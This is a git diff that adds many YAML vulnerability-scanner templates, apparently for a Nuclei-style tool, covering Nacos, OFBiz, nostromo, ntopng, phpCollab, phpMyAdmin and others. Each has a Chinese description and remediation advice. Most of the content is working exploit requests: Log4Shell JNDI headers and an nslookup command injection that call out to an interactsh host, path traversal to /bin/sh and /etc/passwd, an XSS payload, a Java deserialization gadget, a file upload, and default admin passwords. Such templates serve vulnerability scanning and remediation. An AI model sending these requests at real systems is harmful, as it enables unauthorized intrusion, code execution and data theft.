${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}} + Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}} + Authentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}} + Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}} + Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}} + Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}} + Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}} + Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}} + Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}} + User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}} + X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}} + X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}} + X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}} + X-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}} + X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}} diff --git a/config/51pwn/yaml/mongoshake/alibaba-mongoshake-unauth.yaml b/config/51pwn/yaml/mongoshake/alibaba-mongoshake-unauth.yaml new file mode 100755 index 000000000..889928880 --- /dev/null +++ b/config/51pwn/yaml/mongoshake/alibaba-mongoshake-unauth.yaml @@ -0,0 +1,33 @@ +id: alibaba-mongoshake-unauth +info: + name: Alibaba Mongoshake Unauth + author: + - l0ne1y + description: |- + Alibaba Mongoshake 未授权访问漏洞 + MongoShake是阿里云以Golang语言编写的通用平台型服务工具,MongoShake存在未授权访问漏洞,攻击者可利用该漏洞获取敏感信息。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/alibaba/MongoShake + + 临时修复方案: + 1、对漏洞接口开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。 + 2、限制IP访问,绑定固定的IP访问后台管理系统。 +requests: +- matchers: + - type: word + words: + - '{"Uri":"/worker","Method":"GET"}' + - type: word + part: header + words: + - text/plain + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/' + method: GET diff --git a/config/51pwn/yaml/nacos/CVE-2021-29442.yaml b/config/51pwn/yaml/nacos/CVE-2021-29442.yaml new file mode 100755 index 000000000..c1480f06f --- /dev/null +++ b/config/51pwn/yaml/nacos/CVE-2021-29442.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-29442 +info: + name: Nacos prior to 1.4.1 Missing Authentication Check + author: + - l0ne1y + description: |- + Alibaba nacos 访问控制错误漏洞 + nacos是中国阿里巴巴(Alibaba)的一个动态服务发现、配置和服务管理平台。该软件支持基于 DNS 和基于 RPC 的服务发现,可提供提供实时健康检查,阻止服务向不健康的主机或服务实例发送请求等功能。 + + Nacos 存在访问控制错误漏洞,该漏洞源于ConfigOpsController允许用户执行管理操作,比如查询数据库,甚至清除数据库。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/advisories/GHSA-36hp-jr8h-556f + + 临时修复方案: + 1、调用功能前验证用户是否有权限调用相关功能。 + 2、对功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - application/json + - type: regex + part: body + regex: + - '"TABLENAME":"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)"' + matchers-condition: and + path: + - '{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st' + method: GET diff --git a/config/51pwn/yaml/nacos/unauthenticated-nacos-access.yaml b/config/51pwn/yaml/nacos/unauthenticated-nacos-access.yaml new file mode 100755 index 000000000..0fccf685d --- /dev/null +++ b/config/51pwn/yaml/nacos/unauthenticated-nacos-access.yaml @@ -0,0 +1,37 @@ +id: unauthenticated-nacos-access +info: + name: Nacos 1.x - Authentication Bypass + author: + - l0ne1y + description: |- + Alibaba nacos 使用欺骗进行的认证绕过 + 当配置为使用身份验证(-Dnacos.core.auth.enabled=true)时,Nacos 使用 AuthFilter servlet 过滤器来强制执行身份验证。这个过滤器有一个后门,可以让 Nacos 服务器绕过这个过滤器,从而跳过身份验证检查。 + severity: high + remediation: |- + 官方修复建议 + 升级nacos版本至2.0.3以上,https://nacos.io/zh-cn/ + + 临时修复建议: + 修改配置文件,令"-Dnacos.core.auth.enabled=false" +requests: +- matchers: + - type: word + part: header + words: + - 'Content-Type: application/json' + - type: regex + condition: and + part: body + regex: + - '"username":' + - '"password":' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9' + - '{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9' + method: GET + headers: + User-Agent: Nacos-Server diff --git a/config/51pwn/yaml/nifi/ApacheNifi-Api-UnauthorizedAccess.yaml b/config/51pwn/yaml/nifi/ApacheNifi-Api-UnauthorizedAccess.yaml new file mode 100755 index 000000000..de4b506d3 --- /dev/null +++ b/config/51pwn/yaml/nifi/ApacheNifi-Api-UnauthorizedAccess.yaml @@ -0,0 +1,33 @@ +id: ApacheNifi-Api-UnauthorizedAccess +info: + name: Apache Nifi API未授权访问漏洞 + author: + - l0ne1y + description: |- + Apache Nifi API未授权访问漏洞 + Apache NiFi是美国阿帕奇(Apache)软件基金会的一套数据处理和分发系统。该系统主要用于数据路由、转换和系统中介逻辑。 Apache NiFi 1.0.0版本至1.11.4版本存在访问控制错误漏洞。该漏洞源于网络系统或产品未正确限制来自未授权角色的资源访问。 + severity: high + remediation: |- + **官方修复方案:** + 官方已经修复该漏洞,请在链接地址下载最新版本https://nifi.apache.org/download.html + + **临时修复方案:** + 1、API禁止直接暴漏在互联网,需通过VPN等较为安全的接入方式访问内部系统。 + 2、API所有页面开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。 + 3、限制IP访问,绑定固定的IP访问后台管理系统。 +requests: +- matchers: + - type: word + words: + - '"identity":"anonymous","anonymous":true"' + - type: word + part: header + words: + - json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/nifi-api/flow/current-user' + method: GET diff --git a/config/51pwn/yaml/nostromo nhttpd/CVE-2019-16278.yaml b/config/51pwn/yaml/nostromo nhttpd/CVE-2019-16278.yaml new file mode 100755 index 000000000..e67f81dfd --- /dev/null +++ b/config/51pwn/yaml/nostromo nhttpd/CVE-2019-16278.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-16278 +info: + name: nostromo 1.9.6 - Remote Code Execution + author: + - l0ne1y + description: |- + Nostromo nhttpd 路径遍历导致远程代码执行漏洞 + nostromo nhttpd是一款开源的Web服务器。 + + nostromo nhttpd 1.9.6及之前版本中的‘http_verify’函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 + severity: critical + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:http://www.nazgul.ch\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: word + words: + - 8sas2sd223x8rv + raw: + - | + POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 + Host: {{Hostname}} + + echo + echo + echo 8sas2sd223x8rv 2>&1 diff --git a/config/51pwn/yaml/ntopng/CVE-2021-28073.yaml b/config/51pwn/yaml/ntopng/CVE-2021-28073.yaml new file mode 100755 index 000000000..3650cc878 --- /dev/null +++ b/config/51pwn/yaml/ntopng/CVE-2021-28073.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-28073 +info: + name: Ntopng Authentication Bypass + author: + - z3bd + description: |- + Ntopng 身份绕过 + ntopng是一种计算机软件,用于监视计算机网络上的流量。它旨在成为ntop的高性能,低资源替代品。该名称源自ntop下一代。ntopng是根据GNU通用公共许可证发布的开源软件。 + ntopng存在身份验证绕过漏洞,攻击者可凭此漏洞进入后台。 + severity: critical + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + https://www.ntop.org/ + + 临时修复方案:
1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。
3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。
4、采用成熟的权限管理框架,如spring security。
5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。
6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。
7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: word + part: header + words: + - application/json + - type: word + condition: and + words: + - '"results":' + - '"name":' + - '"tab":' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css' + - '{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css' + method: GET diff --git a/config/51pwn/yaml/nweb2fax/CVE-2008-6668.yaml b/config/51pwn/yaml/nweb2fax/CVE-2008-6668.yaml new file mode 100755 index 000000000..0591a03cd --- /dev/null +++ b/config/51pwn/yaml/nweb2fax/CVE-2008-6668.yaml @@ -0,0 +1,30 @@ +id: CVE-2008-6668 +info: + name: nweb2fax <= 0.2.7 Directory Traversal + author: + - l0ne1y + description: |- + nweb2fax 任意文件读取漏洞 + nweb2fax 0.2.7及之前版本存在多个目录遍历漏洞。远程攻击者可以借助到comm.php的id参数和到viewrq.php的var_filename参数(参数值设置为\'\'..\'\'),读取任意文件。 + severity: medium + remediation: |- + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - 'root:.*:0:0:' + matchers-condition: and + path: + - '{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd' + - '{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/ofbiz/CVE-2018-8033.yaml b/config/51pwn/yaml/ofbiz/CVE-2018-8033.yaml new file mode 100755 index 000000000..b72d04b8e --- /dev/null +++ b/config/51pwn/yaml/ofbiz/CVE-2018-8033.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-8033 +info: + name: Apache OFBiz XXE + author: + - l0ne1y + description: |- + Apache OFBiz HttpEngine XML外部实体安全漏洞 + 在Apache OFBiz 16.11.01到16.11.04中,OFBiz HTTP引擎(`org.apache.ofbiz.service.engine.HttpEngine.java`)通过/ webtools / control / httpService端点处理对HTTP服务的请求。对httpService端点的POST和GET请求都可能包含三个参数:serviceName,serviceMode和serviceContext。通过使DOCTYPE指向外部引用来触发从主机返回秘密信息的有效负载,从而实现利用 + severity: high + remediation: | + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + [https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E](https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E) + **临时修复方案** + 1、禁用外部实体 + 2、过滤用户提交的XML数据,关键词:]>&disclose; diff --git a/config/51pwn/yaml/ofbiz/CVE-2020-1943.yaml b/config/51pwn/yaml/ofbiz/CVE-2020-1943.yaml new file mode 100755 index 000000000..3b78f96a2 --- /dev/null +++ b/config/51pwn/yaml/ofbiz/CVE-2020-1943.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-1943 +info: + name: Apache OFBiz Reflected XSS + author: + - l0ne1y + description: |+ + Apache OFBiz 跨站脚本漏洞 + Apache OFBiz是美国阿帕奇(Apache)软件基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 + + Apache OFBiz中存在跨站脚本漏洞。远程攻击者可借助特制的URL利用该漏洞在用户浏览器中执行脚本。 + + severity: medium + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页: + https://www.apache.org/ + + **临时修复方案** + 对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E' + method: GET diff --git a/config/51pwn/yaml/ofbiz/CVE-2020-9496.yaml b/config/51pwn/yaml/ofbiz/CVE-2020-9496.yaml new file mode 100755 index 000000000..f3ba850d5 --- /dev/null +++ b/config/51pwn/yaml/ofbiz/CVE-2020-9496.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-9496 +info: + name: Apache OFBiz XML-RPC Java Deserialization + author: + - l0ne1y + description: |- + Apache Ofbiz 反序列化漏洞 + Apache OFBiz全称是The ApacheOpen For Business Project,是开一个放的电子商务平台,也是一个非常著名的开源项目,Apache ofbiz存在反序列化漏洞,攻击者可以通过未授权访问接口,构造特定的xmlrpc http请求,造成远程代码执行的影响。 + severity: medium + remediation: |- + **官方修复方案:** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://ofbiz.apache.org/security.html + + **临时修复方案:** + 对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - faultString + - No such service [ProjectDiscovery] + - methodResponse + - type: word + part: header + words: + - 'Content-Type: text/xml' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /webtools/control/xmlrpc HTTP/1.1 + Host: {{Hostname}} + Origin: http://{{Hostname}} + Content-Type: application/xml + + ProjectDiscoverydwisiswant0 diff --git a/config/51pwn/yaml/ofbiz/CVE-2021-26295.yaml b/config/51pwn/yaml/ofbiz/CVE-2021-26295.yaml new file mode 100755 index 000000000..902d21846 --- /dev/null +++ b/config/51pwn/yaml/ofbiz/CVE-2021-26295.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-26295 +info: + name: Apache OFBiz <17.12.06 - Arbitrary Code Execution + author: + - l0ne1y + description: |- + Apache OFBiz RMI反序列化任意代码执行漏洞 + Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。2021年3月22日 Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞(CVE-2021-26295)。攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。阿里云应急响应中心提醒 Apache OFBiz 用户尽快采取安全措施阻止漏洞攻击。 + severity: critical + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - dns + - type: word + condition: and + part: body + words: + - errorMessage + - type: word + part: header + words: + - OFBiz.Visitor= + matchers-condition: and + raw: + - | + POST /webtools/control/SOAPService HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + + + + + {{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}} + + + diff --git a/config/51pwn/yaml/ofbiz/ofbiz-default-login.yaml b/config/51pwn/yaml/ofbiz/ofbiz-default-login.yaml new file mode 100755 index 000000000..9bf5b0d15 --- /dev/null +++ b/config/51pwn/yaml/ofbiz/ofbiz-default-login.yaml @@ -0,0 +1,35 @@ +id: ofbiz-default-login +info: + name: Apache OfBiz Default Login + author: + - l0ne1y + description: |- + Apache OfBiz 默认口令登录漏洞 + OFBiz是一个基于Java的网络框架,包括一个实体引擎,一个服务引擎和一个基于widget的用户界面,让您能够快速的原型和开发您的网络应用。其web管理控制台的默认账户是admin/ofbiz + severity: high + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + condition: and + words: + - ofbiz-pagination-template + - Powered by OFBiz + raw: + - | + POST /control/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y + attack: pitchfork + payloads: + password: + - ofbiz + username: + - admin diff --git a/config/51pwn/yaml/opendreambox/CVE-2017-14135.yaml b/config/51pwn/yaml/opendreambox/CVE-2017-14135.yaml new file mode 100755 index 000000000..0a8a9857d --- /dev/null +++ b/config/51pwn/yaml/opendreambox/CVE-2017-14135.yaml @@ -0,0 +1,42 @@ +id: CVE-2017-14135 +info: + name: OpenDreambox 2.0.0 - Remote Code Execution + author: + - l0ne1y + description: |- + opendreambox 操作系统命令注入漏洞 + opendreambox是一套嵌入式Linux系统的构建框架。webadmin plugin是其中的一个Web管理插件。 + + opendreambox 2.0.0版本中的webadmin插件的enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py文件存在安全漏洞。远程攻击者可通过向/script URL发送带有shell元字符的‘command’参数利用该漏洞执行任意的操作系统命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - /bin/sh + - /usr/script + - type: word + part: interactsh_protocol + words: + - dns + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/otter/poc-yaml-otter-default-password.yaml b/config/51pwn/yaml/otter/poc-yaml-otter-default-password.yaml new file mode 100755 index 000000000..bb3448c00 --- /dev/null +++ b/config/51pwn/yaml/otter/poc-yaml-otter-default-password.yaml @@ -0,0 +1,32 @@ +id: poc-yaml-otter-default-password +info: + name: 阿里巴巴otter manager分布式数据库同步系统默认口令漏洞 + author: + - zxcv + description: |- + 阿里巴巴otter manager分布式数据库同步系统默认口令漏洞 + 阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞,攻击者可利用该漏洞获取zookeeper信息,进而获取到各服务与服务器之间对应关系,账号密码为admin/admin + severity: medium + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: status + status: + - 302 + - type: regex + part: header + regex: + - 'Location: https?:/(?:/[^/\s]+)+/channel_list.htm' + matchers-condition: and + raw: + - | + POST /login.htm HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=user_action&event_submit_do_login=1&_fm.l._0.n=admin&_fm.l._0.p=admin +variables: + cmd: echo%20{{verify}} + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/phpCollab/CVE-2017-6090.yaml b/config/51pwn/yaml/phpCollab/CVE-2017-6090.yaml new file mode 100755 index 000000000..80f1de8c3 --- /dev/null +++ b/config/51pwn/yaml/phpCollab/CVE-2017-6090.yaml @@ -0,0 +1,52 @@ +id: CVE-2017-6090 +info: + name: PhpColl 2.5.1 Arbitrary File Upload + author: + - l0ne1y + description: |- + phpCollab editclient.php 文件上传漏洞 + phpCollab是一套基于Web的项目协作管理软件。该软件具有任务分配、讨论、日志和通知等功能。 + + PhpCollab 2.5.1及之前的版本中的clients/editclient.php文件存在任意文件上传漏洞。远程攻击者可利用该漏洞上传并访问带有可执行扩展的文件,来执行任意代码。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.phpcollab.com/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 +requests: +- matchers: + - type: word + part: body + words: + - 48dbd2384cb6b996fa1e2855c7f0567f + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 + + -----------------------------154934846911423734231554128137 + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" + Content-Type: application/x-php + + + + -----------------------------154934846911423734231554128137-- + - | + GET /logos_clients/1.php HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/phpMyAdmin/CVE-2009-1151.yaml b/config/51pwn/yaml/phpMyAdmin/CVE-2009-1151.yaml new file mode 100755 index 000000000..43037ea47 --- /dev/null +++ b/config/51pwn/yaml/phpMyAdmin/CVE-2009-1151.yaml @@ -0,0 +1,38 @@ +id: CVE-2009-1151 +info: + name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability + author: + - l0ne1y + description: |- + phpMyAdmin setup.php脚本PHP代码注入漏洞 + + phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 + + phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12301 + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 